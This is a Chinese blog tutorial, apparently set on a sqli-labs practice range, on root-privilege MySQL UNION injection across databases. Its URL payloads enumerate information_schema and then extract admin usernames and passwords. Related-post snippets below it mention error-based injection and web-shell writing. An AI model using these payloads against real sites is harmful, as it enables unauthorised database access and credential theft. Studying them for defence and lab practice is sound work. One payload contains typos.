MySQL注入之高权限注入

已于 2022-03-17 17:48:00 修改
阅读量1.1k 收藏 1
点赞数
文章标签: mysql 数据库 web安全
于 2022-03-17 17:38:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao_he0123/article/details/123554111
版权

MySQL注入之高权限注入

前言

在数据库中有database,schema,table,user,行,列容易被混淆之间的关系
他们之间的关系可以这样理解:
database是一个家,schema就是这个家里面的各个房间,table就是各个房间里的床,行列就是床上面的东西,user就是指这个家的主人

二、高权限注入

1.什么是高权限注入

在上一篇博文中有提到数据库的构成:
数据库A=网站A(同时又一个用户 A)
表名
列名
数据
数据库B=网站B(同时又一个用户B)
表名
列名
数据
这里的用户又分为普通用户和高级用户(eg.root),普通用户只能访问到自己库内的内容,而高级用户就可以做到跨库查询(就是对A,B库的内容都可以读取)

2.跨库查询思路

1.查看用户名

(之前步骤在上一篇博文中有就不进行重复)
是root所以可以进行高权限注入
在这里插入图片描述

2.获取所有的数据库名

http://www.5418666.xyz/sql/Less-2/?id=-1 union select
1,group_concat(schema_name),3 from information_schema.schemata

在这里插入图片描述

3.获取指定数据库名下的表名信息

这里我已’damicms‘为例

http://www.5418666.xyz/sql/Less-2/?id=-1 union select
1,group_concat(table_name),3 from information_schema.tables where
table_schema=‘damicms’

在这里插入图片描述

4.获取指定damicms下的表名admin下的列名信息

http://www.5418666.xyz/sql/Less-2/?id=-1 union select
1,gruop_concat(column_name),3 from information_schema.columns where
table_name=‘dami_admin’ and table schema=‘damicms’

在这里插入图片描述

4.获取damicms下的admin中的数据

我们要获取后台登陆信息一般都在admin下所以我们去获取admin的数据

http://www.5418666.xyz/sql/Less-2/?id=-1 union select
1,username,password from damicms.dami_admin

在这里插入图片描述

just a leaf
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL高权限注入(附实例)-跨库注入-文件读写操作-魔术引号-防注入方法
ran的博客
01-13 543
此次要进行跨库注入的目标是“Pikachu漏洞联系平台”,而上一步获取到的所有数据库里可以发现有一个数据库名称为“pikachu”,不难判断出此数据库即为跨库注入的目标的数据库。比如下面的数据库A是“root用户”,就可以对相关的网站B、网站C进行跨库注入,但是想要实现跨库注入,首先就需要知道数据库B、数据库C的数据库名称。进行上述操作时,文件路径里的斜杠最好使用“/”或者“\\”,而不是使用默认的“\”,因为在很多编程语言中“\n”代表换行的意思,可能因此会发生错误。
权限注入&跨库注入
hibugs
04-13 376
上篇文章中我们讲述了如何进行手工注入,也通过墨者学院的靶场,真实的感受了SQL注入的感觉。这篇文章我们将继续介绍SQL注入
MYSQL高级爆错注入原理
Coisini的博客
06-23 480
国内只有一大堆高级爆错的利用代码 没人分析原因 这个是去官网查资料后分析给出的。 这里主要用了mysql的一个BUG :http://bugs.mysql.com/bug.php?id=8652 grouping on certain parts of the result from rand, causes a duplicate key error. 重现过程 use mysql; cre...
mysql 高级注入_SQL高级注入
weixin_39638623的博客
01-19 174
SQL Injection Tutorial by Marezzi (MySQL) SQL注入教程由Marezzi(MySQL的)In this tutorial i will describe how sql injection works and how to在本教程中,我将介绍如何SQL注入工程和如何use it to get some useful information.用它来获取一些有...
mysql注入
resilient的博客
08-03 209
1.mysql中数字注入   2.mysql中字符串注入 #注释 ---sksal 也会当成注释来处理
mysql注入-sqlilabs靶场注入
10-15
MySQL注入是一种常见的网络安全漏洞,主要发生在应用程序中,当用户输入的数据未经充分验证或过滤就直接用于构造SQL查询时。SQL注入攻击者可以利用这个漏洞执行恶意的SQL命令,获取、修改、删除数据库中的敏感信息,...
SQL Injection with MySQL 注入分析
09-14
SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)的数据库系统,如MySQL。此技术允许攻击者通过输入恶意SQL代码来操纵或获取数据库中的敏感信息。本文将深入探讨MySQL数据库的SQL注入问题,以及...
MySQL解决SQL注入的另类方法详解
09-10
MySQL中,防止SQL注入有多种方法,包括使用预编译语句、参数化查询、转义特殊字符等。本文主要探讨一些非传统的、另类的方法来解决SQL注入问题。 首先,我们来看问题的本质。当用户输入被直接插入到SQL语句中时,...
PHP+Mysql 带SQL注入源码 下载
04-25
【PHP+MySQL与SQL注入】 在互联网开发中,PHP与MySQL是常见的组合,用于构建动态网站和...在日常开发中,应始终遵循最佳实践,使用预处理语句,限制数据库用户的权限,并定期进行安全性审计,以防止SQL注入等攻击。
PHP、mysql(手工注入
10-12
- **后台后门**:攻击者通过注入获取系统权限,植入后门,用于长期控制和窃取数据。 - 防范措施包括:定期审计代码,删除不必要的功能,限制对敏感文件的访问,使用安全的编程实践,以及实施Web应用防火墙等。 5....
mysql高级报错注入_MYSQL高级报错注入
weixin_34449520的博客
02-08 140
MYSQL高级报错注入and (select count(*) from mysql.user)>0/*1、查看MYSQL版本and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)2、爆所有库and(select 1 from(s...
手动mysql 高级注入实例分析
kendyhj9999的专栏
05-11 950
手动mysql 高级注入实例分析 http://www.jb51.net/hack/28917.html
SQL注入实战————1、MySQL手工注入实战
热门推荐
Fly_鹏程万里
05-06 1万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! SQL注入实战 靶场地址:http://219.153.49.228:48204/show.php?id=MQ== 首先可以看到该URL中存在一个参数“MQ==”,从参...
sql注入高级 mysql_高等SQL注入:混杂跟绕过
weixin_36059505的博客
02-04 150
高级SQL注入:混淆和绕过内容#############.0 00. 简介.0 01. 过滤躲避Mysql.0x01a. 绕过函数跟的过滤.0x01b. 绕过正则表白式过滤.0 02. 常见绕过技术.0 03. 高级绕过技术.0x03a. HTTP参数传染:分别与联合.0x03b. HTTP参数参杂.0 04. 如何维护你的网站.0 05. 总结.0 06....
mysql 5.5 注入,Mysql5高级注射技巧,注入代码总结
weixin_39640417的博客
03-23 134
希望对大家有用,转载请注明 文章来自 刀客'blog此文是看了 Mysql5注射技巧 文章后,自己把代码理了一下。。mysql> use information_schema;Database changedmysql> show tables;---------------------------------------| Tables_in_information_schema |...
第二十五天:WEB攻防-通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL
m0_51322401的博客
01-31 598
分为盘符绝对路径和网址绝对路径盘符绝对路径:顾名思义如图:网址绝对路径:网址的路径,如下图-路径获取:phpinfo,报错,字典等-无法写入:secure_file_priv突破 注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过set global slow_query_log_file=‘shell路径’;select '
SQL注入MYSQL注入
av11566的博客
04-19 7068
前言 MYSQL注入中首先要明确当前注入权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 数据库中符号"
SQL注入和sql-labs通关1-18(手工注入、高权限注入、文件读写、提交方式、查询方式、WAF绕过、sqlmap)
m0_61506558的博客
07-25 830
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。......
MySQL注入
qq_45031509的博客
04-13 954
mysql注入 1.信息收集 1)操作系统:@@version_compile_cs(不同的系统对数据库操作语句的大小写区分) 2)数据库名:database() 3)数据库用户:user()(专门管理数据库的账户),root为最高权限,容易导致跨站注入数 据。普通用户:只能注入自己网站。 4)数据库版本:version()(选择注入) 5)其他网站路径(进行文件读取,为高权限读取做准备) 2.数据注入 1)低版本(暴力或结合读取查询,表名,列名用猜的方式) 2)高版本(information
面试.pdf
最新发布
07-02
面试.pdf

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值